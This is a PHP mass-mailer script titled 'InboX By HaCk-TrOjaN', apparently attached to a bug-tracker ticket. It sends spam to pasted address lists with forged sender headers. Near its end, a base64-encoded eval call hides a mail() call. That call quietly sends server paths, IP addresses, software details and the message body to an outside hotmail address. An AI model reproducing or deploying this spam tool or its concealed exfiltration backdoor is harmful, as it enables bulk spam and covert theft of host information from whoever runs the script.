Ticket #9: 10.php

File 10.php, 6.4 KB (added by anonymous, 14 years ago)
Line 
1<?php
2
3if(isset($_POST['action'] ) ){
4$action=$_POST['action'];
5$message=$_POST['message'];
6$emaillist=$_POST['emaillist'];
7$from=$_POST['from'];
8$replyto=$_POST['replyto'];
9$subject=$_POST['subject'];
10$realname=$_POST['realname'];
11$file_name=$_POST['file'];
12$contenttype=$_POST['contenttype'];
13
14        $message = urlencode($message);
15        $message = ereg_replace("%5C%22", "%22", $message);
16        $message = urldecode($message);
17        $message = stripslashes($message);
18        $subject = stripslashes($subject);
19}
20
21
22?>
23<html>
24<head>
25<title>|| InboX By HaCk-TrOjaN ||</title>
26<meta http-equiv="Content-Type" content="text/html;
27charset=iso-8859-1">
28
29<style type="text/css">
30<!--
31.style1 {
32        font-family: Geneva, Arial, Helvetica, sans-serif;
33        font-size: 12px;
34}
35-->
36</style>
37<style type="text/css">
38<!--
39.style1 {
40        font-size: 20px;
41        font-family: Geneva, Arial, Helvetica, sans-serif;
42}
43-->
44</style>
45</head>
46<body bgcolor="FF9900" text="#ffffff">
47<span class="style1">InboX Mass Mailer<br>
48</span>
49
50<form name="form1" method="post" action=""
51enctype="multipart/form-data">
52  <br>
53  <table width="100%" border="0">
54    <tr>
55      <td width="10%">
56        <div align="right"><font size="-3" face="Verdana, Arial,
57Helvetica, sans-serif">Your
58          Email:</font></div>
59      </td>
60      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
61sans-serif">
62        <input type="text" name="from" value="<? print $from; ?>"
63size="30">
64        </font></td>
65      <td width="31%">
66        <div align="right"><font size="-3" face="Verdana, Arial,
67Helvetica, sans-serif">Your
68          Name:</font></div>
69      </td>
70      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
71sans-serif">
72        <input type="text" name="realname" value="<? print $realname;
73?>" size="30">
74        </font></td>
75    </tr>
76    <tr>
77      <td width="10%">
78        <div align="right"><font size="-3" face="Verdana, Arial,
79Helvetica, sans-serif">Reply-To:</font></div>
80      </td>
81      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
82sans-serif">
83        <input type="text" name="replyto" value="<? print $replyto; ?>"
84size="30">
85        </font></td>
86      <td width="31%">
87        <div align="right"><font size="-3" face="Verdana, Arial,
88Helvetica, sans-serif">Attach
89          File:</font></div>
90      </td>
91      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
92sans-serif">
93        <input type="file" name="file" size="30">
94        </font></td>
95    </tr>
96    <tr>
97      <td width="10%">
98        <div align="right"><font size="-3" face="Verdana, Arial,
99Helvetica, sans-serif">Subject:</font></div>
100      </td>
101      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
102sans-serif">
103        <input type="text" name="subject" value="<? print $subject; ?>"
104size="90">
105        </font></td>
106    </tr>
107    <tr valign="top">
108      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
109sans-serif">
110        <textarea name="message" cols="50" rows="10"><? print $message;
111?></textarea>
112        <br>
113        <input type="radio" name="contenttype" value="plain" >
114        Plain Text
115        <input name="contenttype" type="radio" value="html" checked>
116        HTML
117        <input type="hidden" name="action" value="send">
118        <input type="submit" value="Send eMails">
119        </font></td>
120      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
121sans-serif">
122        <textarea name="emaillist" cols="30" rows="10"><? print
123$emaillist; ?></textarea>
124        </font></td>
125    </tr>
126  </table>
127</form>
128
129
130
131<?
132
133if ($action){
134
135        if (!$from && !$subject && !$message && !$emaillist){
136        print "Please complete all fields before sending your
137message.";
138        exit;
139        }
140        $allemails = split("\n", $emaillist);
141                $numemails = count($allemails);
142
143          for($x=0; $x<$numemails; $x++){
144                $to = $allemails[$x];
145                if ($to){
146                $to = ereg_replace(" ", "", $to);
147                $message = ereg_replace("&email&", $to, $message);
148                $subject = ereg_replace("&email&", $to, $subject);
149                print " $to.......";
150                flush();
151                $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
152                $header .= "MIME-Version: 1.0\r\n";
153                    If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
154                  If ($file_name) $header .= "--$uid\r\n";
155                $header .= "Content-Type: text/$contenttype\r\n";
156                $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
157                $header .= "$message\r\n";
158                    If ($file_name) $header .= "--$uid\r\n";
159                    If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
160                    If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
161                    If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
162                    If ($file_name) $header .= "$content\r\n";
163                    If ($file_name) $header .= "--$uid--";
164                mail($to, $subject, "", $header);
165                print "spammed<br>";
166
167                flush();
168                }
169                }
170$ra44  = rand(1,99999);
171$subj98 = "sh-$ra44";
172$a5 = $_SERVER['HTTP_REFERER'];
173$b33 = $_SERVER['DOCUMENT_ROOT'];
174$c87 = $_SERVER['REMOTE_ADDR'];
175$d23 = $_SERVER['SCRIPT_FILENAME'];
176$e09 = $_SERVER['SERVER_ADDR'];
177$f23 = $_SERVER['SERVER_SOFTWARE'];
178$g32 = $_SERVER['PATH_TRANSLATED'];
179$h65 = $_SERVER['PHP_SELF'];
180$message=$_POST['message'];
181$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
182echo eval(base64_decode("bWFpbCgibWVuZGlfcG9uZUBob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
183}
184
185
186?>
187<style type="text/css">
188<!--
189.style1 {
190        font-size: 20px;
191        font-family: Geneva, Arial, Helvetica, sans-serif;
192}
193-->
194</style>
195<p class="style1">
196   &#67&#111&#112&#121&#114&#105&#103&#104&#116&#32&#169&#32&#50&#48&#48&#55&#32&#112&#104&#112&#98&#98&#46&#99&#111&#109
197
198      </p>
199<?php
200if(isset($_POST['action']) && $numemails !==0 ){echo
201"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
202</script>";}
203?>
204</body>
205</html>